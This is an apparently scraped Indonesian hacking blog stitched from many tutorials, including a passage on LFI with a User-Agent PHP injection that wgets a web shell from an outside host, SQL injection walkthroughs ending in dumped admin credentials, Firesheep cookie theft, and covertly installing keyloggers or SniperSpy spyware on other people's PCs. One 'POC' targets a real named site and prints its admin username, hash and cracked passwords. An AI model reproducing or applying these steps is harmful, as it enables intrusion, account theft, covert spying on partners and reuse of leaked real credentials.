Cara Mengedit File Type .dll [ Dinamic Link Library ]

File yang berekstensikan .dll adalah file yang berukuran kecil, namun didalamnya dapat menampung berartus-ratus file-file. dengan kata lain, file .dll ini berisikan banyak file yang sudah di compress dan dijadikan satu dalam bentuk file.dll

pertanyaan yang muncul adalah : untuk apa file.dll ini?
file.dll ini digunakan oleh program untuk menyimpan bagian-bagian file program untuk diakses agar mudah dan tidak menghabiskan banyak resources.

pada postingan kali ini, saya akan menjelaskan bagaimana cara meng-edit file.dll tersebut.
untuk sistem operasi windows, file.dll dapat di lihat dan di edit isinya dengan menggunakan program tambahan.
dengan kata lain, jika tidak menginstall program tersebut, kita tidak bisa melihat apalagi meng-edit isi-isi file tersebut. karena sistem operasi windows sendiri tidak menyediakan aplikasi bawaan untuk meng-edit file.dll ini.

langsung saja ya.
aplikasi yang digunakan disini adalah "PE-explorer" atau bisa juga menggunakan aplikasi "resources tuner"
kedua aplikasi tersebut bisa di download di indowebster dengan mencari di kotak search yang telah disediakan.
kedua aplikasi  tersebut tidak gratis, jadi, disarankan download yang langsung ada crack nya ya.. :)
besar file setupnya tidak lebih dari 10MB.

langkah-langkahnya sbb :

• instal program PE-explorer atau resources tuner. (biasanya tidak bagus jika diinstal keduanya. jadi pilih salah satu saja, kalau bisa, ya sudah.)

• backup file.dll yang asli (yang ingin dirubah) dengan cara copy-paste, jika di-protect oleh sistem, maksudnya file dll tersebut tidak bisa di copy, bisa menggunakan yang ini. tools tersebut akan menambahkan "add take ownership" pada conteks menu klik  kanan anda. file berekstensi .7z, bisa diekstrak menggunakan winzip atau 7zip. setelah itu, klik 2 kali file "add take ownership.REG" maka anda akan memiliki kuasa penuh untuk file-file system di windows setelah itu.

• setelah di backup, klik 2 kali file.dll yang ingin dirubah.

 
disini saya mencoba merubah file.dll dari norton internet security. dimana diberi nama cssbase.dll

• maka akan muncul jendela dari aplikasi PE-explorer. seperti ini :

 

• itu adalah informasi umum dari file.dll . untuk melihat da mengedit isi-isinya, bisa klik "resource viewer/editor" yang ditunjukkan oleh tanda panah. maka akan muncul jendela baru yang berisikan file-file yang bersangkutan dengan file cssbase.dll itu.

itu adalah tampilan list tree dimana file-file terkelompokan didalam folder-folder tersebut.

baiklah, kita langsung mulai pengeditan.
pada tree folder html, terdapat banyak file gambar.png dimana itu adalah file-file kecil yang nantinya akan diakses dan disusun sehingga menjadi tampilan user interface dari program norton.



saya ingin mengganti background user interface norton internet security yang awalnya, ber-background seperti ini :

jadi saya harus mencari bagian file gambar.PNG yang mana yang cocok yang bisa dirubah agar sesuai keinginan.

 

 

• bisa dilihat pada gambar diatas, bahwa saya telah menemukan file background norton IS dengan nama BACKGROUND_3.PNG. dimana gambarnya ditunjukan disebelah kanan (panah warna merah)

Hacking With Cookies Information

idak selamanya password tidak bisa di crack/decrypt tidak bisa di deface
Ini adalah salah satu contoh login admin tanpa perlu mengcrack encrypt password

Courtesy of http://forum.binushacker.net/hacking/(video)-hacking-with-cookies-information/
ijoo | BH-IHC Moderator

Attack LFI => /proc/self/environ

Salah satu cara Attacker(?penyusup?) dalam memasuki sebuah Server/Website.
adalah dengan LFI ( Local File Inclusion ).
Ciri Website dengan Vuln LFI adalah seperti berikut:

contoh : www.website.com/view.php?page=page1.php

Pertama kita coba dengan mengganti page1.php dengan ../

contoh: www.website.com/view.php?page=../

kira-kira akan terdapat error seperti ini:

Code:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/ijoo/public_html/website.com/view.php on line 1337

sekarang kita coba melihat /etc/passwd nya.. dengan menambahkan ../../etc/passwd

contoh: www.website.com/view.php?page=../../../etc/passwd

kita masih mendapatkan error yang sama tetapi yang kita request ( /etc/passwd ) tidak keluar.. :(

Code:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/ijoo/public_html/website.com/view.php on line 1337

kita test kembali dengan menambahkan ../ pada target website.com

contoh: www.website.com/view.php?page=../../../../../etc/passwd
yes sukses !!

Code:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

tambahkan ../../ sampe kira-kira seperlunya aja?

jgn terlalu panjang? kira-kira maximal 10x ..

Setelah itu kita Cek /proc/self/environ bisa diakses apa tidak?

dengan cara mengganti /etc/passwd dengan /proc/self/environ

contoh: www.website.com/view.php?page=../../../../../proc/self/environ

Kalo keluar seperti dibawah ini.. berarti /proc/self/environ bisa diakses?

Code:

DOCUMENT_ROOT=/home/ijoo/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/Fenviron SCRIPT_FILENAME=/home/ijoo/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

Sekarang langkah berikutnya memasukan Code injection ( php-Shell Code )

Download Addon Mozilla Tamper Data untuk mempermudah

Dengan Tamper Data kita bisa mengubah User-Agent.Start di Firefox:

contoh: www.website.com/view.php?page=../../../../../proc/self/environ

Buka Tamper > start Tamper > ganti User-Agent filed dengan :

Code:

<?system('wget http://www.URL-SHELL-TEXT.com/shell/php-shell.txt -O shell.php');?>

atau

Code:

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

Setelah itu coba buka

contoh: www.website.com/shell.php

Kalo shell kita terbuka... berarti sukses ^_^
Happy hacking...

Cara Hack Akun Facebook Dengan Network Sniffing

PERTAMA:
Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.
KEDUA:
Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.
cara menggunakanya sebagai berikut:
1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik  “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.
nah gimana cara mencegah pencurian password dengan firesheep ini?
kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/
KETIGA:
Bismillah,
pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:

Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:

1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.

Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.
Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?

langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:

1. pertama-tama buka aplikasi wireshark
2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
4. pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
   host www.facebook.com and host alamat.ip.komputer.anda
5. Klik start, maka proses penyadapan akan segera dimulai
6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:
   
8. hasil statistik sniffing paket data facebook
   

Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.
sekian postingan kali ini.

Cara Mempercepat Akses Ke Salah Satu Web Pada Saat Browsing

Contoh web yang akan kita test adalah http://www.cyber4rt.com/
Cekidottt kejedoottt...

1. Buka CMD [command prompt] terus ketikkan : nslookup cyber4rt.com
akan nampak hasilnya sebagai berikut :





2. Selanjutnya buka Drive C => Windows => System32 => drivers => etc.

3. Cari file yang bernama Host kemudian buka dengan NOTEPAD




4. Tambahkan pada baris terakhir hasil nslookup : 96.9.162.181 cyber4rt.com




5. Kemudian save dan silahkan anda membandingkan kembali web yang sudah kita setting tadi

Cara Hack Akun Facebook Dengan Keylogger

PERTAMA:
Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.
KEDUA:
Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?
Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.
Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha
Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.
1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .
2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …
3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho
4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!
5. Kalau proses penginstalan sudah selesai, terus ???
Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha
Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha
Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …

Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.
Nah, Selese dah !!! Mudah to ???
Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.
Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..
Selamat mencoba
KETIGA:

SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.
Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.
Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun

Cara Enable Registry, CMD, TaskManager Yang Di Disable

Masalah Pada Registry :
Cara 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke “Administrative Templates – System – Prevent Access To Registry Editing
Tools”
* Ubah Valuenya menjadi = Enabled, Pilih “No”, klik Apply.

Cara 2 :

* Buka folder “C : \Windows”
* Cari file Regedit.exe
* Rename / Ganti nama file tersebut, misal : “New_Reg.exe”

Masalah Pada CMD [Command Prompt] :
Cara 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke “Administrative Templates – System – Prevent Access To Command Prompt”
* Ubah Valuenya menjadi = Enabled, Pilih “No”, klik Apply.

Cara 2 :

* Menjalankan Perintah Update Registry dengan RUN Klik menu START--> RUN pada kotak
dialog, ketik atau copy perintah dibawah ini :
REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t
REG_DWORD /d 0 /f

Klik tombol OK

* Menjalankan Kembali Command Prompt :
Klik menu START--> RUN
Kemudian ketik CMD pada area teks box input
atau
Klik menu STAR --> PROGRAM --> ACCESORIES --> COMMAND PROMPT

Masalah Pada Task Manager :
Cara 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke “Administrative Templates – System – Ctrl+Alt+Del Option – Remove Task
Manager”
* Ubah Valuenya menjadi “Enable”, ingat ! kemudian Ubah lagi menjadi “Disable” atau
“Not Configured”.
* Apply

Cara 2 :

* Buka RUN atau tekan tombol WIN + R
* isikan dengan :

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD /d 0 /f

* OK

Cara 3 :

* Buka RUN ketikan Regedit
* Masuk pada alamat HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
* Buat Registry baru type “DWORD” dengan nama “DisableTaskMgr”
* isikan value nya = 0

Remote Komputer dengan CMD [ Command Prompt ]

Salah satu senjata terampuh para Hacker adalah Command Prompt, percaya tidak percaya tool bawaan windows ini bisa sama gunanya sama Remote Executor, FTP Manager, dll. tetapi bedanya ini berbasis CUI (Code User Interface) kalo Remote Executor, FTP Manager kebanyakan berbasis GUI (Graphical User Interface) yang semudah klak-klik-klak-klik dll.

Dalam tulisan ini saya akan memberi tutorial meremote komputer orang lain dengan Command Prompt.
Persyaratanya adalah :

1. Pc Kita & Pc target sama-sama sedang connect internet
2. Pc Kita & Pc target sama-sama menggunakan OS Windows


Tentukan IP target mu,Dan Mulai jalankan CMD dengan cara :
Start ====> RUN ===> CMD
Kemudian ketikan perintah dibawah ini :

cd c:\  [enter]

C:\>net use \\ip_target [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

C:\>net use K: \\ip_target\c$ [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

Seperti Gambar Di bawah ini

 

Setelah Sukses Langsung Buka My Computer anda

maka akan terlihat drive K disanalah Drive C target berada
Jika ingin meremot Drive D  cukup mengganti kode net use K: \\ip_target\c$ menjadi net use K: \\ip_target\d$

Nah Bereskan... Berikut saya berika Screenshootnya

Tutorial SQL Injection Step by Step [ Dummies ]

Sebelum men daface sebuah situs, kita bisa menggunakan "dork Sql Injection" dengan bantuan om kita semua ( om google )

Code:

inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

trus yg saya dapat :

Code:

http://www.victim.com/detailproduct.php?id=75

untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url

Code:

http://www.victim.com/detailproduct.php?id=75'

ternyata ada bug-nya, muncul pesan error :

Code:

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1

Untuk mencari column gunakan perintah [ order by ]

Code:

http://www.victim.com/detailproduct.php?id=75 order by 1--

dimulai dengan angka 1, selanjutnya 2, dst sampai muncul pesan error

pada target kita kali ini, error muncul pada angka 19

Code:

http://www.victim.com/detailproduct.php?id=75 order by 19--

muncul pesan error:
Unknown column '19' in 'order clause'

jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)

Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75

akan muncul "angka ajaib" : 3, 11 dan 18
kita pilih salah satunya saja, misal 3

trus kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

muncul tulisan :
5.0.90-community
wewww...ternyata versi 5, klo versi 4 sy angkat tangan.....wkwkwkwk :p
nb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema,
dimana information_schema tidak terdapat pada database MySql versi 4. Jadi kalau targetnya mempunyai database MySQL versi 4,
yang kita lakukan yaitu menebak-nebak tablenya... lol

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib
dan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--

akan muncul nama-nama table :

Code:

login,tbanner,tcatprod,tproduct,tset

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan "user" dan column2 dengan "pass"
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"

Code:

http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--

hasil : admin:admin
jadi,
user = admin
password = admin
nb : Jika ada yang mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini http://hashchecker.de/find.html

Selesai ??? belum....wkwkwkwk :p
Langkah selanjutnya adalah mencari Admin Page target kita. Anda bisa menggunakan "adminfinder" atau "scanlink.py"
download di mari : http://www.ziddu.com/download/10386415/InstantSQLI.rar.html

Klo ada yg dapat admin pagenya... tolong jangan di deface, ini hanya untuk pembelajaran saja.

Menyamar Sebagai GoogleBot

Googlebot adalah perangkat lunak yang digunakan oleh Google, yang mengumpulkan dokumen-dokumen dari web untuk membangun indeks untuk dicari mesin pencari Google.

 

"Googlebot is the search bot software used by Google, which collects documents from the web to build a searchable index for the Google search engine."

(http://en.wikipedia.org/wiki/Googlebot)
 

Bagaimana jadinya ya kalo kita bisa menjadi seperti Googlebot??? Hmm.. salah satu keuntungannya adalah kita bisa mengakses area member situs-situs tertentu tanpa harus login terlebihdahulu (misalnya saja Forum).
 

Lalu bagaiamana cara menyamar sebagai GoogleBot??? Pertanyaan inilah yang ada selalu dibenak saya sebagai h4ck3r pemula dan "mungkin" juga menjadi keinginan anda saat ini!?! Setelah sekian lama saya browsing, akhirnya dapat beberapa referensi bagaimana kita bisa menyamar sebagai Googlebot. Oke, LET'S DO IT NOW...

Langkah pertama, kita persiapankan alatnya, yaitu:
1. PC atau Laptop
2. Mozilla Firefox
3. Add-ons User Agent Switcher

[ DOWNLOAD & INSTALL DISINI ]

  4. Koneksi Internet
 

Langkah kedua, buka Mozilla Firefox dan install add-ons User Agent Switcher-nya, setelah terinstall, ikuti petunjuk dibawah ini :

  

pada browser firefox

Langkah ketiga, setting User Agent Switcher-nya, sebagai berikut:

 

 

Sebagai tambahan agar lebih optimal lagi, ketik di address bar: "about:config", tekan enter maka akan muncul konfigurasi Firefox tekan aja tombol yang ada tulisan "I'll be careful, I promise!". Lalu ketik pada form filter dengan kata "useragent.extra" dan akan muncul kata "general.useragent.extra.firefox" di bahwa preference name, lalu klik 2x, kemudian tambahkan di belakang dengan "; Googlebot".

 

Langkah keempat, lakukan penyecekan di http://private.dnsstuff.com/tools/aboutyou.ch
 

Courtesy of :
http://www.hungry-hackers.com/2009/05/disguise-as-googlebot-to-view-hidden-content-of-a-website.html
http://www.techzilo.com/access-browse-pay-sites-free/

POC Sql Injection on www.cocobod.gh

ebagai contoh kita mendapatkan target sebagai berikut:
Code:

http://www.cocobod.gh/news_details.php?id=30

Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda ' di akhir URL, contohnya sebagai berikut:
Code:

http://www.cocobod.gh/news_details.php?id=30'

Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi "Unknown Column".
Lakukan pengecekan dengan menggunakan perintah "order by".
Kita akan mencoba dari 1....... tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:

http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8--  => Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah "UNION SELECT number,of,columns--" untuk mengatahui kolom mana yang dapat di akses:
Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

Anda akan menemukan seperti gambar berikut:



Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja "@@version", pada kolom dimana saja yang bisa dipakai.
Misalkan kolom "6" kita ganti dengan "@@version"



Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

Akan muncul versi database 5.1.39, ini berarti database bisa di inject

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan "6,2,3" dibagian mana saja, kita gunakan kolom "6", kita ganti dengan code berikut "group_concat(schema_name)" , dan jangan lupa tambahkan "from information_schema.schemata--" sesudah kolom terakhir.

Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_
concat(schema_name),7 from information_schema.schemata--

Mengatahui Database Yang Dipakai
Langsung ajah ganti "group_concat(schema_name)" dengan "concat(database())" seperti contoh berikut:
Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
concat(database()),7 from information_schema.schemata--

Selamat, anda telah mengetahui database yang dipakai saat ini adalah "cocobod_gh".
Mengetahui Nama Tabel

Langsung aja ganti "group_concat(table_name)" dan tambahkan "from information_schema.tables where table_schema=database()--" setelah kolom terakhir.
Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_
concat(table_name),7 from information_schema.tables where table_schema=database()--

Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_
concat(column_name),7 from information_schema.columns where table_schema=database()--

Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:
Code:

http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_
concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--

Exploit akan menjadi seperti berikut :
Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_
concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

Dari informasi di atas kita mendapatkan data: "comaster:a5d45a4bf4258664e521934f5b8c13d6" ,
Silakan check ke MD5 decrypter untuk mendecrypt password => http://rom-zone.alfahosting.org/index2.php?p=hashes paste MD5 password yang tadi yaitu: "a5d45a4bf4258664e521934f5b8c13d6", anda akan medapatkan result seperti dibawah:

comaster:a5d45a4bf4258664e521934f5b8c13d6
comaster:cocoadmin4682
username : comaster
password : 20coco!!
Selamat, anda sudah bisa login ke http://www.cocobod.gh/admin/ dengan user & password di atas

Tekhnik Membuka File Rar Yang Di Password

